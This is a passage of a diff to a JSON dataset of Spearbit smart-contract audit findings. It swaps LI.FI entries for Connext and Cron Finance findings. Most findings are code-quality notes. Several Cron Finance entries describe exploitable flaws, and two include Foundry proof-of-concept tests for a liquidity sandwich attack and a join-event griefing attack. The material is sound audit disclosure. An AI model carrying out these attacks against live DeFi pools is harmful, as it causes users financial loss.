x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { ... } ... for (first; first <= last; ) { ... } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Further gas optimizations for HopFacetOptimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "For the contract HopFacetOptimized it is very important to be gas optimized. Especially on Arbritrum, it is relatively expensive due to the calldata. 24 struct HopData { uint256 bonderFee; uint256 amountOutMin; uint256 deadline; uint256 destinationAmountOutMin; uint256 destinationDeadline; IHopBridge hopBridge; } struct BridgeData { bytes32 transactionId; string bridge; string integrator; address referrer; address sendingAssetId; address receiver; uint256 minAmount; uint256 destinationChainId; bool hasSourceSwaps; bool hasDestinationCall; } function startBridgeTokensViaHopL1ERC20( ILiFi.BridgeData calldata _bridgeData, HopData calldata _hopData ) external { // Deposit assets LibAsset.transferFromERC20(...); _hopData.hopBridge.sendToL2(...); emit LiFiTransferStarted(_bridgeData); } function transferFromERC20(...) ... { if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); if (to == NULL_ADDRESS) revert NoTransferToNullAddress(); IERC20 asset = IERC20(assetId); uint256 prevBalance = asset.balanceOf(to); SafeERC20.safeTransferFrom(asset, from, to, amount); if (asset.balanceOf(to) - prevBalance != amount) revert InvalidAmount(); }", + "title": "Duplicate functions in Encoding.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Encoding.sol defines a few functions already present in TypedMemView.sol: nibbleHex(), byte- Hex(), encodeHex().", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "payable keyword can be removed for some bridge functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "For the above highlighted functions, the native token is never forwarded to the underlying bridge. In these cases, payable keyword and related modifier refundExcessNative(payable(msg.sender)) can be re- moved to save gas.", + "title": "Document about two MerkleTreeManager's", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "On the hub domain (e.g. mainnet) there are two MerkleTreeManagers, one for the hub and one for the MainnetSpokeConnector. This might not be obvious to the casual readers of the code. Accidentally confusing the two would lead to weird issues.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "AmarokData.callTo can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "AmarokFacet's final receiver can be different from _bridgeData.receiver address receiver = _bridgeData.hasDestinationCall ? _amarokData.callTo : _bridgeData.receiver; Since both _amarokData.callTo and _bridgeData.receiver are passed by the caller, AmarokData.callTo can be removed, and _bridgeData.receiver can be assumed as the final receiver.", + "title": "Match filename to contract name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Sometimes the name of the .sol file is different than the contract name. Also sometimes multiple contracts are defined in the same file. Additionally there are multiple .sol files with the same name. This makes it more difficult to find the file containing the contract. File: messaging/Merkle.sol contract MerkleTreeManager is ProposedOwnableUpgradeable { ... } File: messaging/libraries/Merkle.sol library MerkleLib { ... } File: ProposedOwnable.sol abstract contract ProposedOwnable is IProposedOwnable { ... } abstract contract ProposedOwnableUpgradeable is Initializable, ProposedOwnable { ... } File: OZERC20.sol 148 contract ERC20 is IERC20, IERC20Permit, EIP712 { ... }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use requiredEther variable instead of adding twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The cost and nativeAmount are added twice to calculate the requiredEther variable, which can lead to increased gas consumption.", + "title": "Use uint40 for type in TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "All internal functions in TypedMemView use uint40 for type except build(). Since internal functions can be called by inheriting contracts, it's better to provide a consistent interface.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "refundExcessNative modifier can be gas-optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The highlighted code above can be gas-optimized by removing 1 if condition.", + "title": "Comment in function typeOf() is inaccurate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A comment in function typeOf() is inaccurate. It says it is shifting 24 bytes, however it is shifting 216 / 8 = 27 bytes. function typeOf(bytes29 memView) internal pure returns (uint40 _type) { assembly { ... // 216 == 256 - 40 _type := shr(216, memView) // shift out lower 24 bytes } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "BridgeData.hasSourceSwaps can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The field hasSourceSwaps can be removed from the struct BridgeData. _swapData is enough to identify if source swaps are needed.", + "title": "Missing Natspec documentation in TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "unsafeJoin()'s Natspec documentation is incomplete as the second argument to function is not documented.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unnecessary validation argument for native token amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Since both msg.value and feeAmount is controlled by the caller, you can remove feeAmount as an argument and assume msg.value is what needs to be collected. This will save gas on comparing these two values and refunding the extra.", + "title": "Remove irrelevant comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": " Instance 1 - TypedMemView.sol#L770 clone() has this comment that seems to be copied from equal(). This is not applicable to clone() and can be deleted. * @dev Shortcuts if the pointers are identical, otherwise compares type and digest. Instance 2 - SpokeConnector.sol#L499 The function process of SpokeConnector contains comments that are no longer relevant. // check re-entrancy guard // require(entered == 1, \"!reentrant\"); // entered = 0; Instance 3 - BridgeFacet.sol#L419 Nomad is no longer used within Connext. However, they are still being mentioned in the comments within the codebase. * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using ,! the nomad * network.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Restrict access for cBridge refunds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "cBridge refunds need to be triggered from the contract that sent the transaction to cBridge. This can be done using the executeCallAndWithdraw function. As the function is not cBridge specific it can do any calls for the Diamond contract. Restricting what that function can call would allow more secure automation of refunds.", + "title": "Incorrect comment about TypedMemView encoding", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A TypedMemView variable of type bytes29 is encoded as follows: First 5 bytes encode a type flag. Next 12 bytes point to a memory address. Next 12 bytes encode the length of the memory view (in bytes). Next 3 bytes are empty. When shifting a TypedMemView variable to the right by 15 bytes (120 bits), the encoded length and the empty bytes are removed. Hence, this comment is incorrect: // 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) _loc := and(shr(120, memView), _mask)", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Stargate now supports multiple pools for the same token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Stargate protocol now supports multiple pools for the same token on the same chain, each pool may be connected to one or many other chains. It is not possible to store a one-to-one token-to-pool mapping.", + "title": "Constants can be used in assembly blocks directly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. Highlighted code above have the following pattern: uint256 _mask = LOW_12_MASK; // assembly can't use globals assembly { // solium-disable-previous-line no-inline-assembly _len := and(shr(24, memView), _mask) } Here, LOW_12_MASK is a constant which can be used directly in assembly code.", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Expose receiver in GenericSwapFacet facet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Other than the bridge facets the swap facet does not emit the receiver of a transaction yet.", + "title": "Document source of processMessageFromRoot()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function processMessageFromRoot() of ArbitrumHubConnector doesn't contain a comment where it is derived from. Most other functions have a link to the source. Linking to the source would make the function easier to verify and maintain.", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Track the destination chain on ServiceFeeCollector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "ServiceFeeCollector collects gas fees to send to the destination chain. For example /// @param receiver The address to send gas to on the destination chain function collectTokenGasFees( address tokenAddress, uint256 feeAmount, address receiver ) However, the destination chain is never tracked in the contract.", + "title": "Be aware of zombies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _validateSendRoot() of ArbitrumHubConnector check that stakerCount and child- StakerCount are larger than 0. The definition of stakerCount and childStakerCount document that they could include zombies. Its not immediately clear what zombies are, but it might be relevant to consider them. contract ArbitrumHubConnector is HubConnector { function _validateSendRoot(...) ... { ... require(node.stakerCount > 0 && node.childStakerCount > 0, \"!staked\"); } } // Number of stakers staked on this node. This includes real stakers and zombies uint64 stakerCount; // Number of stakers staked on a child node. This includes real stakers and zombies uint64 childStakerCount;", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Executor can reuse SwapperV2 functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Executor.sol's noLeftOvers and _fetchBalances() is copied from SwapperV2.sol.", + "title": "Readability of proveAndProcess()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function proveAndProcess() is relatively difficult to understand because it first processes for the case of i==0 and then does a loop over i==1..._proofs.length. function proveAndProcess(...) ... { ... bytes32 _messageHash = keccak256(_proofs[0].message); bytes32 _messageRoot = calculateMessageRoot(_messageHash, _proofs[0].path, _proofs[0].index); proveMessageRoot(_messageRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); messages[_messageHash] = MessageStatus.Proven; for (uint32 i = 1; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); require(_calculatedRoot == _messageRoot, \"!sharedRoot\"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... }", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Consider adding onERC1155Received", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In addition to ERC721, NFTs can be created using ERC1155 standard. Since, the use case of purchasing an NFT has to be supported, support for ERC1155 tokens can be added.", + "title": "Readability of checker()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function checker() is relatively difficult to read due to the else if chaining of if statements. As the if statements call return(), the else isn't necessary and the code can be made more readable. function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) { return (false, bytes(\"EXECUTION_INTERVAL seconds are not passed yet\")); } else if (lastRootSent == outboundRoot) { return (false, bytes(\"Sent root is the same as the current root\")); } else { execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } }", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "SquidFacet uses a different string encoding library", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "SquidFacet uses an OZ library to convert address to string, whereas the underlying bridge uses a different library. Fuzzing showed that these implementations are equivalent.", + "title": "Use function addressToBytes32", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function dispatch() of SpokeConnector contains an explicit conversion from address to bytes32. There is also a function addressToBytes32() that does the same and is more readable. function dispatch(...) ... { bytes memory _message = Message.formatMessage( ... bytes32(uint256(uint160(msg.sender))), ... );", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Assembly in StargateFacet can be replaced with Solidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function toBytes() contains assembly code that can also be replaced with solidity code. Also, see how-to-convert-an-address-to-bytes-in-solidity. 30 function toBytes(address _address) private pure returns (bytes memory) { bytes memory tempBytes; assembly { let m := mload(0x40) _address := and(_address,0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) mstore(add(m, 20),xor(0x140000000000000000000000000000000000000000, _address) ) mstore(0x40, add(m, 52)) tempBytes := m } return tempBytes; }", + "title": "Balancer Read-Only Reentrancy Vulnerability (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Balancer's read-only reentrancy vulnerability potentially effects the following Cron-Fi TWAMM func- tions: getVirtualReserves getVirtualPriceOracle executeVirtualOrdersToBlock A mitigation was provided by the Balancer team that uses a minimum amount of gas to trigger a reentrancy check. The Balancer vulnerability is discussed in greater detail here: reentrancy-vulnerability-scope-expanded/4345", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Doublecheck quoteLayerZeroFee()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function quoteLayerZeroFee uses msg.sender to determine a fee, while _startBridge() uses _bridgeData.receiver to execute router.swap. This might give different results. function quoteLayerZeroFee(...) ... { return router.quoteLayerZeroFee( ... , toBytes(msg.sender) ); } function _startBridge(...) ... router.swap{ value: _stargateData.lzFee }(..., toBytes(_bridgeData.receiver), ... ); ... }", + "title": "Overpayment of one side of LP Pair onJoinPool due to sandwich or user error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Only one of the two incoming tokens are used to determine the amount of pool tokens minted (amountLP) on join amountLP = Math.min( _token0InU112.mul(supplyLP).divDown(_token0ReserveU112), _token1InU112.mul(supplyLP).divDown(_token1ReserveU112) ); In the event the price moves between the time a minter sends their transaction and when it is included in a block, they may overpay for one of _token0InU112 or _token1InU112. This can occur due to user error, or due to being sandwiched. Concrete example: pragma solidity ^0.7.0; pragma experimental ABIEncoderV2; import \"forge-std/Test.sol\"; import \"../HelperContract.sol\"; import { C } from \"../../Constants.sol\"; import { ExecVirtualOrdersMem } from \"../../Structs.sol\"; contract JoinSandwich is HelperContract { uint256 WAD = 10**18; function testManualJoinSandwich() public { 5 address userA = address(this); address userB = vm.addr(1323); // Add some base liquidity from the future attacker. addLiquidity(pool, userA, userA, 10**7 * WAD, 10**7 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userA), 10**7 * WAD - C.MINIMUM_LIQUIDITY); // Give userB some tokens to LP with. token0.transfer(userB, 1_000_000 * WAD); token1.transfer(userB, 1_000_000 * WAD); addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userB), 10**6 * WAD); exit(10**6 * WAD, ICronV1Pool.ExitType(0), pool, userB); assertEq(CronV1Pool(pool).balanceOf(userB), 0); // Full amounts are returned b/c the exit penalty has been removed (as is being done anyway). assertEq(token0.balanceOf(userB), 1_000_000 * WAD); assertEq(token1.balanceOf(userB), 1_000_000 * WAD); // Now we'll do the same thing, simulating a sandwich from userA. uint256 swapProceeds = swapPoolAddr(5 * 10**6 * WAD, /* unused */ 0, ICronV1Pool.SwapType(0), address(token0), pool, ,! userA); // Original tx from userB is sandwiched now... addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); // Sell back what was gained from the first swap. swapProceeds = swapPoolAddr(swapProceeds, /* unused */ 0, ICronV1Pool.SwapType(0), address(token1), pool, userA); emit log_named_uint(\"swapProceeds 1 to 0\", swapProceeds); // allows seeing what userA lost to fees // Let's see what poor userB gets back of their million token0 and million token1... assertEq(token0.balanceOf(userB), 0); assertEq(token1.balanceOf(userB), 0); exit(ICronV1Pool(pool).balanceOf(userB), ICronV1Pool.ExitType(0), pool, userB); emit log_named_uint(\"userB token0 after\", token0.balanceOf(userB)); emit log_named_uint(\"userB token1 after\", token1.balanceOf(userB)); } } Output: Logs: swapProceeds 1 to 0: 4845178856516554015932796 userB token0 after: 697176321467715374004199 userB token1 after: 687499999999999999999999 1. We have a pool where the attacker is all of the liquidity (107 of each token) 2. A LP tries to deposit another 106 in equal proportions 3. The attacker uses a swap of 5 (cid:3) 106 of one of the tokens to distort the pool. They lose about 155k in the process, but the LP loses far more, nearly all of which goes to the attacker--about 615,324 (sum of the losses of the two tokens since they're equally priced in this example). The attacker could be a significantly smaller proportion of the pool and still find this attack profitable. They could also JIT the liquidity since the early withdrawal penalty has been removed. The attack becomes infeasible for very large pools (has to happen over multiple TXs so can't flash loan --need own capital), but is relevant in practice.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Missing modifier refundExcessNative()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function swapAndStartBridgeTokensViaXDaiBridge() of GnosisBridgeFacet() and Gnosis- BridgeL2Facet() don't have the modifier refundExcessNative(). While other Facets have such a modifier.", + "title": "Loss of Long-Term Swap Proceeds Likely in Pools With Decimal or Price Imbalances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "This TWAMM implementation tracks the proceeds of long-term swaps efficiently via accumulated values called \"scaled proceeds\" for each token. In every order block interval (OBI), the scaled proceeds for e.g. the sale of token 0 are incremented by (quantity of token 1 purchased during the OBI) (cid:3)264= (sales rate of token 0 during the OBI) Then the proceeds of any specific long-term swap can be computed as the product of the difference between the scaled proceeds at the current block (or the expiration block of the order if filled) and the last block for which proceeds were claimed for the order and the order's sales rate, divided by 264: last := min(currentBlock, orderExpiryBlock) prev := block of last proceeds collection, or block order was placed in if this is the first withdrawal LT swap proceeds = (scaledProceedsl ast (cid:0) scaledProceedsprev ) (cid:3) (ordersalesrate)=264 The value 264 is referred to as the \"scaling factor\" and is intended to reduce precision loss in the division to determine the increment to the scaled proceeds. The addition to increment the scaled proceeds and the subtraction to compute its net change is both intentionally done with unchecked arithmetic--since only the difference matters, so long as at most one overflow occurs between claim-of-proceeds events for any given order, the computed proceeds will be correct (up to rounding errors). If two or more overflows occur, however, funds will be lost by the swapper (unclaimable and locked in the contract). Additionally, to cut down on gas costs, the scaled proceeds for the two tokens are packed into a single storage slot, so that only 128 bits are available for each value. This makes multiple overflows within the lifetime of a single order more likely. The CronFi team was aware of this at the start of the audit and specifically requested it be investigated, though they expected a maximum order length of 5 years to be sufficient to avoid the issue in practice. The scaling factor of 264 is approximately 1.8 (cid:3) 1019, close to the unit size of an 18-decimal token. It indeed works well if both pool tokens have similar decimals and relative prices that do not differ by too many orders of magnitude, as the quantity purchased and the sales rate will then be of similar magnitude, canceling to within a few powers of ten (2128 3.4 (cid:3) 1038, leaving around 19 orders of magnitude after accounting for the scaling factor). However, in pools with large disparities in price, decimals, or both, numerical issues are easy to encounter. The most extreme, realistic example would be a DAI-GUSD pool. DAI has 18 decimals while GUSD has only 2. We will treat the price of DAI and GUSD as equal for this analysis, as they are both stablecoins, and arbitrage of the TWAMM pool should prevent large deviations. Selling GUSD at a rate of 1000 per block, with an OBI of 64 (the stable pool order block interval in the audited commit) results in an increment of the scaled proceeds per OBI of: increment = (64 (cid:3) 1000 (cid:3) 1018) (cid:3) 264=(1000 (cid:3) 102) = 1.18 (cid:3) 1037 7 This will overflow an unsigned 128 bit integer after 29 OBIs; at 12 seconds per block, this means the first overflow occurs after 12 (cid:3) 64 (cid:3) 29 = 22272 seconds or about 6.2 hours, and thus the first double overflow (and hence irrevocable loss of proceeds if a withdrawal is not executed in time) will occur within about 12.4 hours (slightly but not meaningfully longer if the price is pushed a bit below 1:1, assuming a deep enough pool or reasonably efficient arbitrage). Since the TWAMM is intended to support swaps that take days, weeks, months, or even years to fill, without requiring constant vigilance from every long-term swapper, this is a strong violation of safety. A less extreme but more market-relevant example would be a DAI-WBTC pool. WBTC has 8 instead of 2 decimals, but it is also more than four orders of magnitude more valuable per token than DAI, making it only about 2 orders of magnitude \"safer\" than a DAI-GUSD pool. Imitating the above calculation with 20_000 DAI = 1 WBTC and selling 0.0025 WBTC (~$50) per block with a 257 block OBI yields: increment = (257 (cid:3) 50 (cid:3) 1018) (cid:3) 264=(0.0025 (cid:3) 108) = 9.48 (cid:3) 1035 OBI to overflow = ceiling(2128=(9.48 (cid:3) 1035)) = 359 time to overflow = 12 (cid:3) 257 (cid:3) 359 = 1107156 seconds = 307 hours = 12.8 days , or a little more than a day to encounter the second overflow. While less bad than the DAI-GUSD example, this is still likely of significant concern given that the CronFi team indicated these are parameters under which the TWAMM should be able to function safely and DAI-WBTC is a pair of interest for the v1 product. It is worth noting that these calculations are not directly dependent on the quantity being sold so long as the price stays roughly constant--any change in the selling rate will be compensated by a proportional change in the proceeds quantity as their ratio is determined by price. Thus the analysis depends only on relative price and relative decimals, to a good approximation--so a WBTC-DAI pool can be expected to experience an overflow roughly every two weeks at prevailing market prices, so long as the net selling rate is non-zero.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Special case for cfUSDC tokens in CelerIMFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function startBridgeTokensViaCelerIM() has a special case for cfUSDC tokens, whereas swapAndStartBridgeTokensViaCelerIM() doesn't have this. function startBridgeTokensViaCelerIM(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { if (...) { // special case for cfUSDC token asset = IERC20(CelerToken(_bridgeData.sendingAssetId).canonical()); } else { ... } } ... } function swapAndStartBridgeTokensViaCelerIM(...) ... { ... if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { // no special case for cfUSDC token } ... }", + "title": "An attacker can block any address from joining the Pool and minting BLP Tokens by filling the joinEventMap mapping.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "An attacker can block any address from minting BLP Tokens. This occurs due to the MAX_JOIN_- EVENTS limit, which is present in the JoinEventLib library. The goal for an attacker is to block a legitimate user from minting BLP Tokens, by filling the joinEventMap mapping. The attacker can fill the joinEventMap mapping by performing the following steps: The attacker mints BLP Tokens from 50 different addresses. Each address transfers the BLP Tokens, alongside the join events, to the user targeted with a call to the CronV1Pool(pool).transfer and CronV1Pool(pool).transferJoinEvent functions respectively. Those transfers should happen in different blocks. After 50 blocks (50 * 12s = 10 minutes) the attacker has blocked the legitimate user from minting _BLP Tokens_, as the maximum size of the joinEventMap mapping has been reached. 8 The impact of this vulnerability can be significant, particularly for smart contracts that allow users to earn yield by providing liquidity in third-party protocols. For example, if a governance proposal is initiated to generate yield by providing liquidity in a CronV1Pool pool, the attacker could prevent the third-party protocol from integrating with the CronV1Pool protocol. A proof-of-concept exploit demonstrating this vulnerability can be found below: function testGriefingAttack() public { console.log(\"-----------------------------\"); console.log(\"Many Users mint BLP tokens and transfer the join events to the user 111 in order to fill the array!\"); ,! for (uint j = 1; j < 51; j++) { _addLiquidity(pool, address(j), address(j), 2_000, 2_000, 0); vm.warp(block.timestamp + 12); vm.startPrank(address(j)); //transfer the tokens CronV1Pool(pool).transfer(address(111), CronV1Pool(pool).balanceOf(address(j))); //transfer the join events to the address(111) CronV1Pool(pool).transferJoinEvent(address(111), 0 , CronV1Pool(pool).balanceOf(address(j))); vm.stopPrank(); } console.log(\"Balance of address(111) before minting LP Tokens himself\", ,! ICronV1Pool(pool).balanceOf(address(111))); //user(111) wants to enter the pool _addLiquidity(pool, address(111), address(111), 5_000, 5_000, 0); console.log(\"Join Events of user address(111): \", ICronV1Pool(pool).getJoinEvents(address(111)).length); console.log(\"Balance of address(111) after adding the liquidity: \", ICronV1Pool(pool).balanceOf(address(111))); ,! ,! }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "External calls of SquidFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions CallBridge and CallBridgeCall do random external calls. This is done via a sepa- rate contract multicall SquidMulticall. This might be used to try reentrancy attacks. function _startBridge(...) ... { ... squidRouter.bridgeCall{ value: msgValue }(...); ... squidRouter.callBridgeCall{ value: msgValue }(...); ... }", + "title": "The executeVirtualOrdersToBlock function updates the oracle with the wrong block.number", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The executeVirtualOrdersToBlock is external, meaning anyone can call this function to execute virtual orders. The _maxBlock parameter can be lower block.number which will make the oracle malfunction as the oracle update function _updateOracle uses the block.timestamp and assumes that the update was called with the reserves at the current block. This will make the oracle update with an incorrect value when _maxBlock can be lower than block.number.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Missing test coverage for triggerRefund Function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current test suite does not include test cases for the triggerRefund function. This oversight may lead to undetected bugs or unexpected behavior in the function's implementation.", + "title": "The _join function does not check if the recipient is address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "As stated within the Balancer's PoolBalances.sol // The Vault ignores the `recipient` in joins and the `sender` in exits: it is up to the Pool to keep track of ,! // their participation. The recipient is not checked if it's the address(0), that should happen within the pool implementation. Within the Cron implementation, this check is missing which can cause losses of LPs if the recipient is sent as address(0). This can have a high impact if a 3rd party integration happens with the Cron pool and the \"joiner\" is mistakenly sending an address(0). This becomes more dangerous if the 3rd party is a smart contract implementation that connects with the Cron pool, as the default value for an address is the address(0), so the probability of this issue occurring increases.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Implicit assumption in MakerTeleportFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of MakerTeleportFacet has the implicit assumption that dai is an ERC20 token. However on GnosisChain the native asset is (x)dai. Note: DAI on GnosisChain is an ERC20, so unlikely this would be a problem in practice. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai),...); ... }", + "title": "Canonical token pairs can be griefed by deploying new pools with malicious admins", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "function create( address _token0, address _token1, string memory _name, string memory _symbol, uint256 _poolType, address _pauser ) external returns (address) { CronV1Pool.PoolType poolType = CronV1Pool.PoolType(_poolType); requireErrCode(_token0 != _token1, CronErrors.IDENTICAL_TOKEN_ADDRESSES); (address token0, address token1) = _token0 < _token1 ? (_token0, _token1) : (_token1, _token0); requireErrCode(token0 != address(0), CronErrors.ZERO_TOKEN_ADDRESSES); requireErrCode(getPool[token0][token1][_poolType] == address(0), CronErrors.EXISTING_POOL); address pool = address( new CronV1Pool(IERC20(_token0), IERC20(_token1), getVault(), _name, _symbol, poolType, ,! address(this), _pauser) ); //... Anyone can permissionlessly deploy a pool, with it then becoming the canonical pool for that pair of tokens. An attacker is able to pass a malicious _pauser the twamm pool, preventing the creation of a legitimate pool of the same type and tokens. This results in race conditions between altruistic and malicious pool deployers to set the admin for every token pair. 10 Malicious actors may grief the protocol 